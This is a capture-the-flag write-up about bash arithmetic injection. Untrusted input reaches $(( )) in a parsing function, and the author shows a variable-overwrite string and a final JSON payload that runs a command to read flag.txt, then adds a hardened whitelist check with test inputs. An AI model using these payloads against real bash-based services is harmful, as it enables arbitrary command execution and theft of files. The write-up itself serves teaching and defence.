Tags: bash rce 

Rating: 2.0

After fiddling around, I've found a strange code segment:

```bash
parseString() {
    local task_i
    local result_str="${!res}"   # indirect expansion: the string held in the variable named by $res
    for (( task_i=0; task_i < ${#result_str}; task_i++ )); do
        if [[ "${result_str:$task_i:5}" = "task " ]]; then
            # everything after "task " is taken verbatim as the suffix
            local suffix="${result_str:$((task_i+5)):$((${#result_str}-task_i-5))}"
            # the range check feeds the untrusted suffix straight into $(( ))
            if [[ "$((suffix > 0))" = "1" && "$((suffix <= 8))" = "1" ]]; then
                local color=$var_name
                normalizeNumber "$suffix" $color "var_"
                eval ${res}'[_color]=${color}'
            fi
        fi
    done
    # (the rest of the function is not shown in the original excerpt)
}
```

Basically, strings with values like `task N` were evaluated in a special way to produce colors.

However, the arithmetic evaluation is vulnerable to injection: bash expands a variable's contents inside `$(( ))` and evaluates them as an expression, so `$((suffix > 0))` runs whatever the suffix contains. This allows arbitrary variables to be modified (though only to numeric values):

```
"task 1+(i=42)+(suffix=0)"
```

After some poking around, reading `man bash` and crying, I've discovered that [this work has already been done](https://github.com/p4-team/ctf/tree/master/2019-10-19-seccon/multiplicater) and it's possible to just execute arbitrary commands. Final exploit:

```json
{"a": "task 1+(var_10=__[$(cat flag.txt >&2)])+(suffix=0)", "b": "c", "d": 55}
```
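A hardened version of the range check, written here as an added example (it is not code from the challenge or from the linked p4-team writeup): the suffix is whitelisted as a plain decimal integer before any `$(( ))` runs, which closes both the variable-overwrite and the command-substitution variants above. The function names `task_suffix`, `parse_task` and `demo` are my own, and the inputs in `demo` are constructed.

```shell
# Hardened replacement for the "task N" check. Shell arithmetic $(( )) evaluates
# assignments, array subscripts and $(...) inside the expression, so an untrusted
# suffix must be proven to be a plain number BEFORE it reaches arithmetic.

# task_suffix: echo the number and return 0 if $1 is a decimal integer in 1..8;
# otherwise echo nothing and return 1. A rejected value never reaches $(( )).
task_suffix() {
    case "$1" in
        ''|*[!0-9]*|0*) return 1 ;;   # empty, any non-digit, or leading zero
    esac
    [ "${#1}" -le 3 ] || return 1     # bound the length; also avoids integer overflow
    # Now safe: the value is 1-3 digits, so $(( )) only sees a literal number.
    n=$(( $1 ))
    if [ "$n" -ge 1 ] && [ "$n" -le 8 ]; then
        printf '%s\n' "$n"
        return 0
    fi
    return 1
}

# parse_task: mirror parseString()'s "task " prefix handling for one value.
parse_task() {
    case "$1" in
        "task "*) task_suffix "${1#task }" ;;
        *) return 1 ;;
    esac
}

# Constructed inputs: a legitimate value, the variable-overwrite payload from the
# writeup, a harmless stand-in for the $(...) variant, and boundary cases.
# Only "task 3" should be accepted.
demo() {
    for input in "task 3" "task 1+(i=42)+(suffix=0)" \
                 'task 1+(var_10=__[$(true)])+(suffix=0)' \
                 "task 0" "task 9" "task 07" "task  3"; do
        if out=$(parse_task "$input"); then
            printf 'ACCEPT %s -> %s\n' "$input" "$out"
        else
            printf 'REJECT %s\n' "$input"
        fi
    done
}

demo
```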